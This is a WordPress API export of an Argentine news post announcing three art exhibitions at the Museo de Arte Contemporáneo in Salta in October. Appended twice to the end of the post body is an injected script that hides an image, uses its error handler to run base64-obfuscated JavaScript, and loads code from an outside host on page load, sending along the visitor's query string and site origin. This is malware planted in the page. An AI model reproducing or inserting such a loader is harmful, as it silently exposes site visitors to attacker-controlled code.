{"id":1665,"date":"2022-10-24T10:22:39","date_gmt":"2022-10-24T13:22:39","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=1665"},"modified":"2025-08-14T00:32:26","modified_gmt":"2025-08-14T03:32:26","slug":"mac-imperdibles-muestras-para-visitar-en-octubre","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=1665","title":{"rendered":"MAC: Imperdibles muestras para visitar en Octubre"},"content":{"rendered":"\n<h3 class=\"has-cyan-bluish-gray-color has-text-color has-background wp-block-heading\" style=\"background-color:#7b0926\"><em>En el Museo de Arte Contempor\u00e1neo (MAC), se pueden recorrer las muestras de Blanca Machuca, Valeria Feli\u00fa y Samuel D\u00b4Ippolito.<\/em><\/h3>\n\n\n\n<p>Blanca Machuca presenta, en la Planta Alta, \u201cAlunados \u2013 Ecolog\u00eda Humana\u201d, muestra de textiles con texto curatorial de Andre\u00ed Fern\u00e1ndez.<\/p>\n\n\n\n<p>Las prendas que pueden reconocerse en las piezas de la artista tucumana: blusas, vestidos, corbatas, ya tuvieron sus propias historias en diferentes cuerpos y se ensamblan con representaciones de otros seres, objetos y vac\u00edos que dan testimonio de presencias humanas.<\/p>\n\n\n\n<p>Ella propone evocar al renacimiento que es llamado en el tao\u00edsmo \u201cvolver el coraz\u00f3n a cero\u201d, que sigue la trayectoria de la Luna, en el paso de la oscuridad hacia la luz. Construye as\u00ed un territorio po\u00e9tico-ritual textil, comenta Andre\u00ed Fernandez.<\/p>\n\n\n\n<p>Por su parte, en la Planta Baja, Valeria Feli\u00fa expone su muestra \u201cGuardianas\u201d, en la que se podr\u00e1 apreciar \u00f3leos sobre tela y t\u00e9cnicas mixtas sobre papel.<\/p>\n\n\n\n<p>\u201cGuardianas\u201d es el resultado de una extensa investigaci\u00f3n de car\u00e1cter cient\u00edfico sobre la biodiversidad global en riesgo de extinci\u00f3n. Se podr\u00e1 ver en cada cuadro una determinada especie vulnerable, protegida y cuidada por una figura femenina que representa la imprescindible concientizaci\u00f3n que debe alcanzar la civilizaci\u00f3n actual para lograr un sano equilibrio entre el h\u00e1bitat natural y la poblaci\u00f3n humana.<\/p>\n\n\n\n<p>Con un lenguaje visual de c\u00f3modo acceso y comprensi\u00f3n para el p\u00fablico general, la artista destaca: \u201cTodos somos naturaleza, y el arte es una manera, un medio, para visibilizar y ponerle palabras a las especies que peligran y no pueden levantar su propia voz\u201d<\/p>\n\n\n\n<p>Feli\u00fa tambi\u00e9n tiene a su cargo la nueva intervenci\u00f3n en las vidrieras de proyecto V.A.C.A, con \u201cNorte\u201d, una mirada multifac\u00e9tica sobre nuestra regi\u00f3n que muestra el resultado de muchos a\u00f1os viviendo, observando, fotografiando y estudiando nuestra Salta, sus formas y colores. La artista trabaja mayormente retratos y figuras realistas mezclando elementos de la naturaleza junto con patrones y dise\u00f1os.<\/p>\n\n\n\n<p>Los rostros son una caracter\u00edstica muy distintiva del ser humano, y seg\u00fan dice la artista \u201chablan por s\u00ed solos\u201d. Hablan de historias, pensamientos, determinados momentos, situaciones o ilusi\u00f3n\u201d. La mirada puesta mayormente en la Puna, trajo a la vida esta serie de rostros que se presentan en la exhibici\u00f3n donde la fuerza de los cambios, los movimientos del &nbsp;tiempo y la variada percepci\u00f3n, incorporan alteraciones a una figura cl\u00e1sica dando paso a retratos contempor\u00e1neos con cierta distorsi\u00f3n.<\/p>\n\n\n\n<p>Finalmente, el artista belga Samuel D\u00b4Ippolito, presenta la exposici\u00f3n \u201cLa Flor \u2013 Principio de Conexi\u00f3n\u201d, instalaci\u00f3n y esculturas sociales.<\/p>\n\n\n\n<p>Artista autodidacta, D\u00b4Ippolito transforma, esculpe y organiza los elementos de su entorno inmediato, tomando prestado a la naturaleza sus esencias mas b\u00e1sicas para crear instalaciones inmersivas, dejando a los visitantes en su propia experimentaci\u00f3n.<\/p>\n\n\n\n<p>El artista recrea espacios simult\u00e1neos para guiarnos en un ejercicio reticular, en el cual la complejidad art\u00edstica se percibe m\u00e1s all\u00e1 del volumen y el vac\u00edo o los sentidos y el pensamiento, para configurar una perspectiva integradora, una experiencia emocional e invariablemente simb\u00f3lica.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/mac-imperdibles-muestras-para-visitar-en-octubre-85637\" target=\"_blank\" rel=\"noopener\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>En el Museo de Arte Contempor\u00e1neo (MAC), se pueden recorrer las muestras de Blanca Machuca, Valeria Feli\u00fa y Samuel D\u00b4Ippolito. Blanca Machuca presenta, en la Planta Alta, \u201cAlunados \u2013 Ecolog\u00eda Humana\u201d, muestra de textiles con texto curatorial de Andre\u00ed Fern\u00e1ndez. Las prendas que pueden reconocerse en las piezas de la artista tucumana: blusas, vestidos, corbatas, [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":1666,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[26],"tags":[],"class_list":{"0":"post-1665","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-culturales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1665"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1665"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1665\/revisions"}],"predecessor-version":[{"id":7307,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1665\/revisions\/7307"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/1666"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1665"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1665"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1665"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}